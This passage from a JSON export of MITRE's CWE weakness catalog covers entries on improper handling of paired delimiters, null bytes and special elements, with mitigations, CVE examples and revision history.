State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that grouping elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0956","Description":"Crash via missing paired delimiter (open double-quote but no closing double-quote).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0956"},{"Reference":"CVE-2000-1165","Description":"Crash via message without closing \\"&gt;\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1165"},{"Reference":"CVE-2005-2933","Description":"Buffer overflow via mailbox name with an opening double quote but missing a closing double quote, causing a larger copy than expected.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2933"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Grouping Element / Paired Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"15"}}},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Grouping Element / Paired Delimiter","attr":{"@_Date":"2008-04-11"}}}},"158":{"attr":{"@_ID":"158","@_Name":"Improper Neutralization of Null Byte or NUL Character","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes NUL characters or null bytes when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected NUL character or null byte may cause the software to believe the input is terminated earlier than it actually is, or otherwise cause the input to be misinterpreted. This could then be used to inject potentially dangerous input that occurs after the null byte or otherwise bypass validation routines and other protection mechanisms.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that null characters or null bytes will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1284","Description":"NUL byte in theme name causes directory traversal impact to be worse","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1284"},{"Reference":"CVE-2005-2008","Description":"Source code disclosure using trailing null.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2008"},{"Reference":"CVE-2005-3293","Description":"Source code disclosure using trailing null.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3293"},{"Reference":"CVE-2005-2061","Description":"Trailing null allows file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2061"},{"Reference":"CVE-2002-1774","Description":"Null character in MIME header allows detection bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1774"},{"Reference":"CVE-2000-0149","Description":"Web server allows remote attackers to view the source code for CGI programs via a null character (%00) at the end of a URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0149"},{"Reference":"CVE-2000-0671","Description":"Web server earlier allows allows remote attackers to bypass access restrictions, list directory contents, and read source code by inserting a null character (%00) in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0671"},{"Reference":"CVE-2001-0738","Description":"Logging system allows an attacker to cause a denial of service (hang) by causing null bytes to be placed in log messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0738"},{"Reference":"CVE-2001-1140","Description":"Web server allows source code for executable programs to be read via a null character (%00) at the end of a request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1140"},{"Reference":"CVE-2002-1031","Description":"Protection mechanism for limiting file access can be bypassed using a null character (%00) at the end of the directory name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1031"},{"Reference":"CVE-2002-1025","Description":"Application server allows remote attackers to read JSP source code via an encoded null byte in an HTTP GET request, which causes the server to send the .JSP file unparsed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1025"},{"Reference":"CVE-2003-0768","Description":"XSS protection mechanism only checks for sequences with an alphabetical character following a (&lt;), so a non-alphabetical or null character (%00) following a &lt; may be processed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0768"},{"Reference":"CVE-2004-0189","Description":"Decoding function in proxy allows regular expression bypass in ACLs via URLs with null characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0189"},{"Reference":"CVE-2005-3153","Description":"Null byte bypasses PHP regexp check (interaction error).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3153"},{"Reference":"CVE-2005-4155","Description":"Null byte bypasses PHP regexp check (interaction error).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4155"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Null Character / Null Byte"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":28,"Entry_Name":"Null Byte Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;NUL Character Injection&#34;, Page 411"}}},"Notes":{"Note":{"#text":"This can be a factor in multiple interpretation errors, other interaction errors, filename equivalence, etc.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Null Character / Null Byte","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Null Character / Null Byte","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Null Byte or NUL Character","attr":{"@_Date":"2010-04-05"}}]}},"159":{"attr":{"@_ID":"159","@_Name":"Improper Handling of Invalid Use of Special Elements","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly filter, remove, quote, or otherwise manage the invalid use of special elements in user-controlled input, which could cause adverse effect on its behavior and integrity.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Common Special Element Manipulations"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":[{"#text":"The list of children for this entry is far from complete. However, the types of special elements might be too precise for use within CWE.","attr":{"@_Type":"Maintenance"}},{"#text":"Precise terminology for the underlying weaknesses does not exist. Therefore, these weaknesses use the terminology associated with the manipulation.","attr":{"@_Type":"Terminology"}},{"#text":"Customized languages and grammars, even those that are specific to a particular product, are potential sources of weaknesses that are related to special elements. However, most researchers concentrate on the most commonly used representations for data transmission, such as HTML and SQL. Any representation that is commonly used is likely to be a rich source of weaknesses; researchers are encouraged to investigate previously unexplored representations.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":[{"#text":"Common Special Element Manipulations","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Special Element","attr":{"@_Date":"2020-02-24"}}]}},"160":{"attr":{"@_ID":"160","@_Name":"Improper Neutralization of Leading Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled leading special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that leading special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Leading Special Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Leading Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Leading Special Element","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Leading Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"161":{"attr":{"@_ID":"161","@_Name":"Improper Neutralization of Multiple Leading Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled multiple leading special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"160","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that multiple leading special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Leading Special Elements"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content 